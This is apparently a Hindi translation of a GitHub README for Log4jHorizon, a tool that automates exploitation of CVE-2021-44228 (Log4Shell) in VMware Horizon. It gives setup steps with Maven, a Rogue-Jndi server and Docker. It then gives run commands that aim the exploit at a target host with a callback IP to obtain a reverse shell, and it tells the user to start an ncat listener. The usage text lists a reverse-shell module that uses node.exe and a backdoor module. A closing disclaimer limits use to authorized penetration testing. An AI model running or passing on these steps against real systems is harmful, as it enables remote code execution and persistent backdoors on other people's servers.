
CVE-2021-44228 का VMWare Horizon में दोहन करना, रिमोट कोड निष्पादन और अधिक के लिए।
VMWare Horizon में CVE-2021-44228 का दोहन करना, रिमोट कोड एक्ज़ीक्यूशन और अधिक के लिए।
इस बार कोड और README.md थोड़े बिखरे हुए हैं। अपडेट आ रहे हैं!
इस कमज़ोरी के प्रूफ ऑफ कॉन्सेप्ट बिखरे हुए हैं और इन्हें मैन्युअल रूप से करना पड़ता है। यह रिपॉज़िटरी एक्सप्लॉइटेशन प्रक्रिया को स्वचालित करती है। पोस्ट-एक्सप्लॉइटेशन के लिए मार्गदर्शन हेतु ऊपर दिया गया ब्लॉग पोस्ट देखें।
इस रिपॉज़िटरी का उपयोग मैन्युअल रूप से या Docker के साथ किया जा सकता है।
एक्सप्लॉइट को मैन्युअल रूप से डाउनलोड और चलाने के लिए, निम्नलिखित चरणों को निष्पादित करें। पहले, सुनिश्चित करें कि आपके अटैकर होस्ट पर Java और Maven इंस्टॉल हैं। Debian आधारित ऑपरेटिंग सिस्टम पर apt का उपयोग करके ऐसा करने के लिए, निम्नलिखित कमांड चलाएँ:
apt update && apt install openjdk-11-jre maven
GitHub रिपॉज़िटरी को क्लोन करें और सभी python आवश्यकताएँ इंस्टॉल करें:
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && pip3 install -r requirements.txt
Log4jHorizon रिपॉज़िटरी के रूट से, नीचे दिए गए कमांड का उपयोग करके Rogue-Jndi प्रोजेक्ट को संकलित करें:
mvn package -f utils/rogue-jndi/
पहले, सुनिश्चित करें कि आपके अटैकिंग होस्ट पर Docker इंस्टॉल है। (मैं आपको यह करने के बारे में नहीं बताऊँगा)
उसके बाद, रिपॉज़िटरी को क्लोन करने और उस Docker इमेज को बनाने के लिए निम्नलिखित कमांड निष्पादित करें जिसका हम उपयोग करेंगे।
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
&& cd Log4jHorizon && docker build -t Log4jHorizon .
कंटेनर चलाने के लिए, अपने कमांड लाइन फ़्लैग्स जोड़कर निम्नलिखित जैसा कमांड चलाएँ। ध्यान दें कि कंटेनर रिवर्स शेल को नहीं पकड़ेगा। आपको एक अलग शेल सेशन में ncat लिसनर बनाना होगा:
docker run -it -p 1389:1389 Log4jHorizon \
-r -t horizon.acme.com -i 192.168.1.1 -p 4444
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL VMWare Horizon IP
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.
-r, --revshell Module to establish reverse shell using node.exe.
-b, --backdoor Module to add backdoor.
अपने स्थानीय सिस्टम पर इंस्टॉल किए गए टूल का उपयोग करके रिवर्स शेल प्राप्त करें:
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1
यह टूल पेनेट्रेशन टेस्टिंग के दौरान उपयोग के लिए डिज़ाइन किया गया है; पूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की ज़िम्मेदारी है। डेवलपर्स कोई दायित्व नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।